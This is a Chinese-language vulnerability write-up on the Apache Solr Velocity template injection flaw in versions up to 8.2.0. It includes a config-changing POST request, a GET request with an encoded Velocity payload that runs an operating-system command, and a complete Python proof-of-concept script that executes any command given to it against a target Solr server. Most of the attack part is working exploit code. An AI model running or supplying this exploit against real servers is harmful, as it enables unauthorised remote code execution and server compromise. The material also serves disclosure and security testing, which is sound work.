漏洞描述

  1.   Apache Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-serviceAPI接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。<br />      国外安全研究员 @s00py发布了Apache Solr velocity模板注入漏洞及exp,目前官网还未发布对此漏洞的安全补丁。<br />[https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt](https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt)

影响版本

<=8.2.0(最新版本)

漏洞复现

首先,访问Core Admin得到应用Path路径
image.png

Set “params.resource.loader.enabled” as true

  1. POST /solr/test/config HTTP/1.1
  2. Host: solr:8983
  3. Content-Type: application/json
  4. Content-Length: 259
  6. {
  7.   "update-queryresponsewriter": {
  8.     "startup": "lazy",
  9.     "name": "velocity",
  10.     "class": "solr.VelocityResponseWriter",
  11.     "template.base.dir": "",
  12.     "solr.resource.loader.enabled": "true",
  13.     "params.resource.loader.enabled": "true"
  14.   }
  15. }

image.png

执行命令

  1. GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
  2. Host: localhost:8983

image.png

poc:
solr-velocity-rce.py

  1. import requests
  2. import sys
  3. import json
  6. def get_core(url):
  7.     solr_url = url + '/solr/admin/cores?wt=json&indexInfo=false'
  8.     r = requests.get(solr_url,verify=False,timeout=30)
  9.     core_name = list(json.loads(r.text)["status"])[0]
  10.     core_url = url + "/solr/" + core_name + "/config"
  11.     set_config(core_url)
  15. def set_config(core_url):
  16.     headers = {
  17.         'User-Agent': "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; "
  18.                       ".NET CLR 2.0.50727)",
  19.         'Content-Type': 'application/json'
  20.     }
  21.     data = """
  22.     {
  23.         "update-queryresponsewriter": {
  24.             "startup": "lazy",
  25.             "name": "velocity",
  26.             "class": "solr.VelocityResponseWriter",
  27.             "template.base.dir": "",
  28.             "solr.resource.loader.enabled": "true",
  29.             "params.resource.loader.enabled": "true"
  30.         }
  31.     }
  32.     """
  33.     r = requests.post(core_url,data=data,headers=headers,verify=False,timeout=30)
  34.     if r.status_code == 200:
  35.         print (r.content)
  36.         exp_url = core_url[:-7]
  37.         #print (exp_url)
  38.         cmd = sys.argv[2]
  39.         send_exp(exp_url,cmd)
  40.     else:
  41.         print ("set config false!\n")
  44. def send_exp(exp_url,cmd):
  46.     exp_url = exp_url + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom" \
  47.                                             "=%23set(" \
  48.                                             "$x=%27%27)+%23set($rt=$x.class.forName(" \
  49.                                             "%27java.lang.Runtime%27))+%23set(" \
  50.                                             "$chr=$x.class.forName(%27java.lang.Character%27))+%23set(" \
  51.                                             "$str=$x.class.forName(" \
  52.                                             "%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(" \
  53.                                             "%27" + cmd + "%27))+$ex.waitFor(" \
  54.                                                           ")+%23set($out=$ex.getInputStream())+%23foreach($i+in+[" \
  55.                                                           "1..$out.available(" \
  56.                                                           ")])$str.valueOf($chr.toChars($out.read()))%23end"
  58.     r = requests.get(exp_url,verify=False,timeout=30)
  59.     print (exp_url)
  60.     print (r.content)
  62. if __name__ == '__main__':
  64.     url = sys.argv[1]
  65.     print("\n[+] python %s http://x.x.x.x:8983  command\n" % sys.argv[0])
  66.     get_core(url)